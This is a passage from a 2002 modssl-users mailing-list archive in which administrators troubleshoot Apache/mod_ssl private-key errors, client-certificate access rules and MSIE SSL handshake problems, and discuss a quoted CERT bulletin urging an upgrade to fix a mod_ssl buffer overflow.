from userid 1005) id 1212D4CE736; Wed, 6 Mar 2002 20:26:31 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g26I0bv10755; Wed, 6 Mar 2002 19:00:37 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from correo.e-netfinger.com id SAA01088; Wed, 6 Mar 2002 18:30:43 +0100 (MET) Received: from correo.e-netfinger.com ([127.0.0.1]) by correo.e-netfinger.com (Netscape Messaging Server 4.15) with ESMTP id GSKBDU00.BOJ for ; Wed, 6 Mar 2002 18:32:18 +0100 From: "Ricardo Hernandez null" To: modssl-users@modssl.org Message-ID: <1b80920fdc.20fdc1b809@correo.e-netfinger.com> Date: Wed, 06 Mar 2002 18:32:18 +0100 X-Mailer: Netscape Webmail MIME-Version: 1.0 Content-Language: en Subject: error private key not found X-Accept-Language: en Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA01119 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ricardo Hernandez null" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I’ve installed the follow products in a Sun Machine - Apache 1.3.22 - Openssl 0.9.6b - Mod-ssl 2.8.5 - Solaris 8 I’ve done the compilation and instalation well but when I start the “APACHE” program the follow error messages appear: I’ve installed the follow products in a Sun Machine - Apache 1.3.22 - Openssl 0.9.6b - Mod-ssl 2.8.5 I’ve done the compilation and instalation well but when I start the “APACHE” program the follow error messages appear: # ./apachectl start [Wed Mar 6 11:35:40 2002] [alert] httpd: Could not determine the server's fully qualified domain name, using 10.32.10.150 for ServerName ./apachectl start: httpd started # ls -l total 10 -rw-r--r-- 1 root other 454 Mar 4 21:56 access_log -rw-r--r-- 1 root other 556 Mar 6 11:35 error_log -rw-r--r-- 1 root other 4 Mar 6 11:35 httpd.pid -rw-r--r-- 1 root other 1637 Mar 6 11:35 ssl_engine_log -rw------- 1 nobody other 0 Mar 4 21:39 ssl_mutex.479 -rw------- 1 nobody other 0 Mar 6 11:35 ssl_mutex.768 -rw------- 1 nobody other 0 Mar 6 11:35 ssl_scache.dir -rw------- 1 nobody other 0 Mar 6 11:35 ssl_scache.pag # more error_log [Wed Mar 6 11:35:41 2002] [alert] httpd: Could not determine the server's fully qualified domain name, using 10.32.10.150 for ServerName [Wed Mar 6 11:35:41 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6b configured -- resuming normal operations [Wed Mar 6 11:35:41 2002] [notice] Accept mutex: fcntl (Default: fcntl) # more ssl_engine_log [06/Mar/2002 11:35:40 00768] [info] Server: Apache/1.3.22, Interface: mod_ssl/2.8.5, Library: OpenSSL/0.9.6b [06/Mar/2002 11:35:40 00768] [info] Init: 1st startup round (still not detached) [06/Mar/2002 11:35:40 00768] [info] Init: Initializing OpenSSL library [06/Mar/2002 11:35:41 00768] [info] Init: Seeding PRNG with 136 bytes of entropy [06/Mar/2002 11:35:41 00768] [info] Init: Generating temporary RSA private keys (512/1024 bits) [06/Mar/2002 11:35:41 00768] [info] Init: Configuring temporary DH parameters (512/1024 bits) [06/Mar/2002 11:35:41 00769] [info] Init: 2nd startup round (already detached) [06/Mar/2002 11:35:41 00769] [info] Init: Reinitializing OpenSSL library [06/Mar/2002 11:35:41 00769] [info] Init: Seeding PRNG with 136 bytes of entropy [06/Mar/2002 11:35:41 00769] [info] Init: Configuring temporary RSA private keys (512/1024 bits) [06/Mar/2002 11:35:41 00769] [info] Init: Configuring temporary DH parameters (512/1024 bits) [06/Mar/2002 11:35:41 00769] [info] Init: Initializing (virtual) servers for SSL I stop Apache # ./apachectl stop ./apachectl stop: httpd stopped I start Apache SSL # ./apachectl startssl [Wed Mar 6 11:42:25 2002] [alert] httpd: Could not determine the server's fully qualified domain name, using 10.32.10.150 for ServerName Apache:mod_ssl:Error: Private key not found. **Stopped ./apachectl startssl: httpd could not be started The logs # ls -l total 10 -rw-r--r-- 1 root other 454 Mar 4 21:56 access_log -rw-r--r-- 1 root other 840 Mar 6 11:42 error_log -rw-r--r-- 1 root other 2225 Mar 6 11:42 ssl_engine_log -rw------- 1 nobody other 0 Mar 4 21:39 ssl_mutex.479 # more error_log [Wed Mar 6 11:35:41 2002] [alert] httpd: Could not determine the server's fully qualified domain name, using 10.32.10.150 for ServerName [Wed Mar 6 11:35:41 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6b configured -- resuming normal operations [Wed Mar 6 11:35:41 2002] [notice] Accept mutex: fcntl (Default: fcntl) [Wed Mar 6 11:41:26 2002] [notice] caught SIGTERM, shutting down [Wed Mar 6 11:42:25 2002] [error] mod_ssl: Init: Private key not found (OpenSSL library error follows) [Wed Mar 6 11:42:25 2002] [error] OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header too long # more ssl_engine_log [05/Mar/2002 09:23:34 00625] [info] Server: Apache/1.3.22, Interface: mod_ssl/2.8.5, Library: OpenSSL/0.9.6b [05/Mar/2002 09:23:34 00625] [info] Init: 1st startup round (still not detached) [05/Mar/2002 09:23:34 00625] [info] Init: Initializing OpenSSL library [05/Mar/2002 09:23:34 00625] [info] Init: Loading certificate & private key of SSL-aware server intsolar8:443 [05/Mar/2002 09:23:35 00625] [error] Init: Private key not found (OpenSSL library error follows) [05/Mar/2002 09:23:35 00625] [error] OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header too long [06/Mar/2002 11:35:40 00768] [info] Server: Apache/1.3.22, Interface: mod_ssl/2.8.5, Library: OpenSSL/0.9.6b [06/Mar/2002 11:35:40 00768] [info] Init: 1st startup round (still not detached) [06/Mar/2002 11:35:40 00768] [info] Init: Initializing OpenSSL library [06/Mar/2002 11:35:41 00768] [info] Init: Seeding PRNG with 136 bytes of entropy [06/Mar/2002 11:35:41 00768] [info] Init: Generating temporary RSA private keys (512/1024 bits) [06/Mar/2002 11:35:41 00768] [info] Init: Configuring temporary DH parameters (512/1024 bits) [06/Mar/2002 11:35:41 00769] [info] Init: 2nd startup round (already detached) [06/Mar/2002 11:35:41 00769] [info] Init: Reinitializing OpenSSL library [06/Mar/2002 11:35:41 00769] [info] Init: Seeding PRNG with 136 bytes of entropy [06/Mar/2002 11:35:41 00769] [info] Init: Configuring temporary RSA private keys (512/1024 bits) [06/Mar/2002 11:35:41 00769] [info] Init: Configuring temporary DH parameters (512/1024 bits) [06/Mar/2002 11:35:41 00769] [info] Init: Initializing (virtual) servers for SSL [06/Mar/2002 11:42:25 00782] [info] Server: Apache/1.3.22, Interface: mod_ssl/2.8.5, Library: OpenSSL/0.9.6b [06/Mar/2002 11:42:25 00782] [info] Init: 1st startup round (still not detached) [06/Mar/2002 11:42:25 00782] [info] Init: Initializing OpenSSL library [06/Mar/2002 11:42:25 00782] [info] Init: Loading certificate & private key of SSL-aware server intsolar8:443 [06/Mar/2002 11:42:25 00782] [error] Init: Private key not found (OpenSSL library error follows) [06/Mar/2002 11:42:25 00782] [error] OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header too long The Certificate has been ordered to a CA for IIS machine with W2000 OS. I’ve exported the certificate and I’ve applied this command: make certificate TYPE=existing CRT=/path/crt make install ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 11:35:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA21256; Thu, 7 Mar 2002 11:34:49 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from abiri-e.com id LAA21203; Thu, 7 Mar 2002 11:33:49 +0100 (MET) Received: (qmail 30439 invoked from network); 7 Mar 2002 11:35:25 -0000 Received: from unknown (HELO AMIRCOMPUTER) (10.200.1.4) by 0 with SMTP; 7 Mar 2002 11:35:25 -0000 Message-ID: <007e01c1c5c3$a3c006d0$0401c80a@AMIRCOMPUTER> From: "Amir Abiri" To: Subject: How do i start ? Date: Thu, 7 Mar 2002 12:34:19 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_007B_01C1C5D4.673B1B30" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Amir Abiri" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_007B_01C1C5D4.673B1B30 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: quoted-printable I just recently installed mod_ssl from an rpm, and i wanted to know if = there is some document that exaplains what i NEED in the httpd.conf file = for the minimum set of functions. The howto and the reference simply throw a metric ton of information at = me, and i don't udnerstand everything they are saying. Which Directives = i must have in the conf file and which are optional ? which of the = files i should use and where ? --=20 "God is a programmer". ------=_NextPart_000_007B_01C1C5D4.673B1B30 Content-Type: text/html; charset="windows-1255" Content-Transfer-Encoding: quoted-printable
I just recently installed mod_ssl from = an rpm, and=20 i wanted to know if there is some document that exaplains what i NEED in = the=20 httpd.conf file for the minimum set of functions.
The howto and the reference simply = throw a metric=20 ton of information at me, and i don't udnerstand everything they are = saying.=20 Which Directives i must have in the conf file and which are = optional ?=20 which of the </ssl.???/*> files i should use and where = ?
--
"God is a=20 programmer".
------=_NextPart_000_007B_01C1C5D4.673B1B30-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 14:36:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA01522; Thu, 7 Mar 2002 14:35:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp02.hutchcity.com id OAA01499; Thu, 7 Mar 2002 14:34:39 +0100 (MET) Received: (qmail 97957 invoked from network); 7 Mar 2002 13:28:30 -0000 Received: from unknown (HELO webmail02) ([202.45.84.76]) (envelope-sender ) by localhost (qmail-ldap-1.03) with SMTP for ; 7 Mar 2002 13:28:30 -0000 Message-ID: <4024225.1015507730866.JavaMail.root@webmail02> Date: Thu, 7 Mar 2002 21:28:50 +0800 (HKT) From: Angus Lee To: modssl-users@modssl.org Subject: .htaccess not processed with client authentication Mime-Version: 1.0 Content-Type: text/plain; charset=Big5 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Angus Lee X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, list, I used .htaccess to add client authentication to access a particular directory. However it seems that .htaccess is not processed occassionally when http request is made to an object in that directory. Anything wrong with my configuration? SSLRequireSSL SSLVerifyClient require SSLVerifyDepth 1 SSLRequire %{SSL_CLIENT_M_SERIAL} eq "A6" And when requet to a file requires client authentication, the server would return 'Internal Server Probelm' after a long run. Is my server having too few resources? Please help. Thank you. Angus Lee ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 14:49:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA01979; Thu, 7 Mar 2002 14:48:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13409.mail.yahoo.com id OAA01950; Thu, 7 Mar 2002 14:47:10 +0100 (MET) Message-ID: <20020307134706.54869.qmail@web13409.mail.yahoo.com> Received: from [194.170.10.5] by web13409.mail.yahoo.com via HTTP; Thu, 07 Mar 2002 05:47:06 PST Date: Thu, 7 Mar 2002 05:47:06 -0800 (PST) From: Shiva Murugesan Subject: Re: .htaccess not processed with client authentication To: modssl-users@modssl.org In-Reply-To: <4024225.1015507730866.JavaMail.root@webmail02> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Try to put all these directives in httpd.conf file and also try to put the SSLRequire directive as follows SSLRequire %{SSL_CLIENT_M_SERIAL} eq "A6" -- Shiva --- Angus Lee wrote: > Hi, list, > > I used .htaccess to add client authentication to > access a particular directory. However it seems that > .htaccess is not processed occassionally when http > request is made to an object in that directory. > Anything wrong with my configuration? > > SSLRequireSSL > SSLVerifyClient require > SSLVerifyDepth 1 > SSLRequire %{SSL_CLIENT_M_SERIAL} eq "A6" > > And when requet to a file requires client > authentication, the server would return 'Internal > Server Probelm' after a long run. Is my server > having too few resources? Please help. Thank you. > > Angus Lee > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Try FREE Yahoo! Mail - the world's greatest free email! http://mail.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 14:49:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA01985; Thu, 7 Mar 2002 14:48:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13404.mail.yahoo.com id OAA01968; Thu, 7 Mar 2002 14:47:58 +0100 (MET) Message-ID: <20020307134757.95445.qmail@web13404.mail.yahoo.com> Received: from [194.170.10.5] by web13404.mail.yahoo.com via HTTP; Thu, 07 Mar 2002 05:47:57 PST Date: Thu, 7 Mar 2002 05:47:57 -0800 (PST) From: Shiva Murugesan Subject: Re: IE browser does not disply proper error message if the certificate is expired To: modssl-users@modssl.org In-Reply-To: <20020305050456.53395.qmail@web13409.mail.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Any help from anyone? I need this desperately. Sincerely Shiva --- Shiva Murugesan wrote: > Many thanks jon. The problem occurs in 5.5 and 6.0 > as > well. > I have tried unchecking the "Show friendly error > message", still it is not displaying the correct SSL > message. After unchecking, it started asking twice > to > present the client certificate. After presenting the > client certificate for the second time, it displays > the standard error message. > > Ta > Shiva > > > > --- jon schatz wrote: > > On Mon, 2002-03-04 at 15:50, jon schatz wrote: > > > if you uncheck "Tools -> Internet Options -> > > Advanced -> Show Friendly > > > HTTP error messages", you can get more useful > > info. Unfortunately, the > > > default is to show the same error message for > > everything. You'll have to > > > change this by hand on your end users' machines > > (or write an ActiveX > > > control to do it for you). > > > > oops. this is on ie 5.5/6.0. i can't speak for ie > > 5.0 personally. so > > ymmv. > > > > -jon > > > > -- > > jon@divisionbyzero.com || www.divisionbyzero.com > > gpg key: www.divisionbyzero.com/pubkey.asc > > think i have a virus?: > > www.divisionbyzero.com/pgp.html > > "You are in a twisty little maze of Sendmail > rules, > > all confusing." > > > > > ATTACHMENT part 2 application/pgp-signature > name=signature.asc > > > > __________________________________________________ > Do You Yahoo!? > Try FREE Yahoo! Mail - the world's greatest free > email! > http://mail.yahoo.com/ > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Try FREE Yahoo! Mail - the world's greatest free email! http://mail.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 17:04:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA07502; Thu, 7 Mar 2002 17:03:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from downbelow.pns.anl.gov id RAA07468; Thu, 7 Mar 2002 17:02:03 +0100 (MET) Received: from downbelow.pns.anl.gov (downbelow.pns.anl.gov [146.139.156.217]) by downbelow.pns.anl.gov (8.11.6/8.9.3) with ESMTP id g27G21f13229 for ; Thu, 7 Mar 2002 10:02:01 -0600 Message-ID: <3C878EF9.84A8CC5C@downbelow.pns.anl.gov> Date: Thu, 07 Mar 2002 10:02:01 -0600 From: Rick Goyette Organization: Argonne National Laboratory X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.4.9-31smp i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: new rpm for apache-mod_ssl? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rick Goyette X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am running apache-mod_ssl-1.3.20.2.8.4-2, and I like it very much. It is a complete package of apache and ssl, and, as it was packaged into a RedHat rpm, was easy to install. However, the recent security advisory concerning the buffer overflow in mod_ssl (appended below) demonstrates my need for an update. I am unable to locate an rpm which corrects this problem. Is there another way to correct this, short of uninstalling apache-mod_ssl and then installing apache-1.3.23 and mod_ssl-2.8.7-1.3.23 serarately? INFORMATION BULLETIN mod_ssl and Apache_SSL Modules Contain a Buffer Overflow [CERT Vulnerability Note VU#234971] March 6, 2002 00:00 GMT Number M-053 ____________________________________________________________________________ __ PROBLEM: There is a remotely exploitable buffer overflow in two modules that implement the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocol. PLATFORM: mod_ssl in all versions prior to 2.8.7-1.3.23. Apache-SSL in all version prior to 1.3.22+1.4.6. DAMAGE: An attacker may be able to execute arbitrary code on the system with the privileges of the ssl module. SOLUTION: Upgrade to mod_ssl 2.8.7 or Apache_SSL 1.3.22+1.46, or apply the patch provided by your vendor. ____________________________________________________________________________ __ VULNERABILITY The risk is MEDIUM. To exploit the overflow, the server must be ASSESSMENT: configured to allow client certificates, and an attacker must obtain a carefully crafted client certificate that has been signed by a Certificate Authority (CA) which is trusted by the server. -- R. J. Goyette Argonne National Laboratory RJGoyette@anl.gov http://www.pns.anl.gov ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 19:03:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA14178; Thu, 7 Mar 2002 19:02:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from microanswers.net id TAA14162; Thu, 7 Mar 2002 19:01:49 +0100 (MET) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by microanswers.net (8.11.0/8.11.0) with SMTP id g27IUET13928 for ; Thu, 7 Mar 2002 12:30:15 -0600 Message-ID: <000901c1c601$d08aaa60$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3C878EF9.84A8CC5C@downbelow.pns.anl.gov> Subject: Re: new rpm for apache-mod_ssl? Date: Thu, 7 Mar 2002 11:59:22 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear R. J. Goyette at Argonne National Laboratory, Just a FYI. I went to your web site at http://zuul.pns.anl.gov/security/ and clicked on the four Links under Destinations. Nothing happens. No propellers; no hour glass; no meter filling up on the browser-wowser. Is it possible that I have something hosed up on my end or are you intending that these links be that secure? Now, for my main question, about your posted CERT RISK statement, to wit: ------------- RE:>> VULNERABILITY ASSESSMENT: The risk is MEDIUM. To exploit the overflow, the server must be configured to allow client certificates, and an attacker must obtain a carefully crafted client certificate that has been signed by a Certificate Authority (CA) which is trusted by the server. ------------- Recently, I miraculously got mod_ssl working with apache in something less than a day (with the secure server being hosted by a new second server which was my first experience installing SuSE Linux). I thought that to be something just short of a miracle, considering the level of investment that was made. And, I have not even scratched the scratch of what is available under the hood for additional features with mod_ssl. However, just prior to this successful effort, I spent the better part of two days figuring out why I could not telnet or ftp to one of my servers, only to discover that it was because my firewall was so tight that it wouldn't let telnet or ftp packets through. I know that viruses, and those who continue to manufacture them, are at an all time high. And, I know that Governor Tom Rich and the Homeland Security folks need to have a big chunk of their budget devoted to catching these rascals; and then for the snacks and sandwiches required to feed the large crowds that will gather at various sites around the country to see these scoundrels hanged... Yet in light of this reality, is the above statement of risk informing smaller web server providers that we need to pay great homage to this seemingly remote possibility, or risk being forever in a state of turmoil? I really want to learn more about mod_ssl on this list, but if this is necessary, then ... Please open my eyes... Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 19:49:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16372; Thu, 7 Mar 2002 19:48:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta6.snfc21.pbi.net id TAA16358; Thu, 7 Mar 2002 19:47:55 +0100 (MET) Received: from christopher.tokpela.com ([63.200.61.35]) by mta6.snfc21.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GSM003OX9JSSR@mta6.snfc21.pbi.net> for modssl-users@modssl.org; Thu, 07 Mar 2002 10:47:53 -0800 (PST) Date: Thu, 07 Mar 2002 10:38:41 -0800 From: Christopher Taranto Subject: Re[2]: MSIE broken SSL implementation - problems with mod_ssl / openssl In-reply-to: <3C85E6C5.5E2207C9@ubizen.com> X-Sender: efaqs.com/christopher@opal.he.net To: modssl-users@modssl.org Cc: "Carl D'Halluin" Message-id: <4.3.2.7.2.20020306111756.0474a970@opal.he.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Carl, Unfortunately, I have had no luck in tracking down or fixing this problem. And it's really a big problem in my opinion. I haven't had enough time to really dig deep on the using openssl to debug the connection - but I don't really know what I would be looking for specifically. Fortunately (I guess otherwise I would have a special bald spot on my head!), I have access to a broken MSIE browser available in my office that I can use to repeatedly test the server for errors - so there is a way of trying to find the problem. Here is what I have tried: openssl s_server -accept 4443 -WWW -cert /usr/local/apache/conf/ssl.crt/www.condoms.net.crt -key /usr/local/apache/conf/ssl.key/www.condoms.net.key -state -debug When I use this, I get this: Using default temp DH parameters ACCEPT and the system waits for me forever - and I am not sure what to put in. openssl s_client -connect condoms.net:443 CONNECTED(00000003) depth=0 /C=US/ST=California/L=San Francisco/O=Condom Sense/OU=DN/CN=www.condoms.net verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 /C=US/ST=California/L=San Francisco/O=Condom Sense/OU=DN/CN=www.condoms.net verify error:num=27:certificate not trusted verify return:1 depth=0 /C=US/ST=California/L=San Francisco/O=Condom Sense/OU=DN/CN=www.condoms.net verify error:num=21:unable to verify the first certificate verify return:1 --- Certificate chain 0 s:/C=US/ST=California/L=San Francisco/O=Condom Sense/OU=DN/CN=www.condoms.net i:/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority --- Server certificate -----BEGIN CERTIFICATE----- MIID0zCCA0CgAwIBAgIQWlU/retDZkl/izm7HTNt4TANBgkqhkiG9w0BAQQFADBf MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXUlNBIERhdGEgU2VjdXJpdHksIEluYy4x LjAsBgNVBAsTJVNlY3VyZSBTZXJ2ZXIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw HhcNMDExMTI1MDAwMDAwWhcNMDIxMTI4MjM1OTU5WjB4MQswCQYDVQQGEwJVUzET MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxQNU2FuIEZyYW5jaXNjbzEVMBMG A1UEChQMQ29uZG9tIFNlbnNlMQswCQYDVQQLFAJETjEYMBYGA1UEAxQPd3d3LmNv bmRvbXMubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC91jpQDQ/gzKLn u4BLU9rkzp9RPVSTo10u/A7j4nBGHv9oJrswuNxJA5oyNF/naTHX0xNuzWK9LL7A cK/VwciZIHRCXkQq7Xh4pWbdOjRFBhKRmgt0L2roBggPx+ecaH+sUdNOqQvDq68n 0iyVCgnNEmGzTfIKiBN5dVJbHNTOnwIDAQABo4IBeTCCAXUwCQYDVR0TBAIwADAL BgNVHQ8EBAMCBaAwPAYDVR0fBDUwMzAxoC+gLYYraHR0cDovL2NybC52ZXJpc2ln bi5jb20vUlNBU2VjdXJlU2VydmVyLmNybDCBrAYDVR0gBIGkMIGhMIGeBgtghkgB hvhFAQcBATCBjjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24uY29t L0NQUzBiBggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlT aWduJ3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcg VmVyaVNpZ24wHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMBkGCmCGSAGG +EUBBg8ECxYJOTI2MDIyNDI3MDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYY aHR0cDovL29jc3AudmVyaXNpZ24uY29tMA0GCSqGSIb3DQEBBAUAA34APutHvd2q aMtbW9hBuGRxGdMie9mgwQgcJC+8TX24M8eg9xKGHdk3u5sURI+I1tNgPRoeeVB0 TKSgiIHkkYhiCEoQD6aJyRisaVeI4wI8NC1qXSSRcuDDra+52lPUQK9hMIpvzENo XV0Cj0KnaPVqkfr/4zRrU9UTE370Jqg= -----END CERTIFICATE----- subject=/C=US/ST=California/L=San Francisco/O=Condom Sense/OU=DN/CN=www.condoms.net issuer=/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority --- No client certificate CA names sent --- SSL handshake has read 1539 bytes and written 314 bytes --- New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA Server public key is 1024 bit SSL-Session: Protocol : TLSv1 Cipher : EDH-RSA-DES-CBC3-SHA Session-ID: 2917B720C36856CC4B2CB63951F9502C449D28905F58FFFF56BF2418AA916E74 Session-ID-ctx: Master-Key: 8DB2F877627C8AEE402DBC388F9ACB72C397637E70C87D43AFD7735E2949827C4AAFA6903D88BA7F3B99AFBFAD5BECE4 Key-Arg : None Start Time: 1015525852 Timeout : 300 (sec) Verify return code: 21 (unable to verify the first certificate) --- >>Seems like Microsoft deliberately put some broken SSL implementation in Seems pretty amazing to me that all of the commercial servers that use mod_ssl as a base would or wouldn't have this same issue - but I have not heard of any problems like this with other apache servers like Raven, Stronghold, etc... Maybe there are problems - but I have not been able to find any mention of them. And, it seems very convenient to MS in light of their IIS market share :-) My server configuration has already been posted in a previous message (let me know if you need me to repost it). Let me know if any of this makes sense to you or if you have any ideas. Sincerely, Christopher Taranto At 10:52 AM 3/6/02 +0100, you wrote: >Hello, > >I read your entries in a newsgroup. >I am having exactly the same problem, and I don't want to tell my users >"upgrade your browser, or use netscape". > >I wonder whether you finally found a solution to this embarassing >problem. >Seems like Microsoft deliberately put some broken SSL implementation in >their browser, in order to kill apache / openssl... > >Thx > >Carl D'Halluin >Security Engineer. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 22:38:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25158; Thu, 7 Mar 2002 22:37:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id WAA25108; Thu, 7 Mar 2002 22:36:22 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 8E2434CE741; Thu, 7 Mar 2002 22:36:21 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g27Js0A71776; Thu, 7 Mar 2002 20:54:00 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lennier.cc.vt.edu id RAA09890; Thu, 7 Mar 2002 17:54:04 +0100 (MET) Received: from steiner.cc.vt.edu (IDENT:mirapoint@steiner-lb.cc.vt.edu [10.1.1.14]) by lennier.cc.vt.edu (8.11.4/8.11.4) with ESMTP id g27Gs3g158245 for ; Thu, 7 Mar 2002 11:54:03 -0500 (EST) Received: from brectanu.ais.vt.edu (brectanu.ais.vt.edu [128.173.240.85]) by steiner.cc.vt.edu (Mirapoint Messaging Server MOS 3.1.0.36-EA) with ESMTP id AAF93109; Thu, 7 Mar 2002 11:54:17 -0500 (EST) Received: from 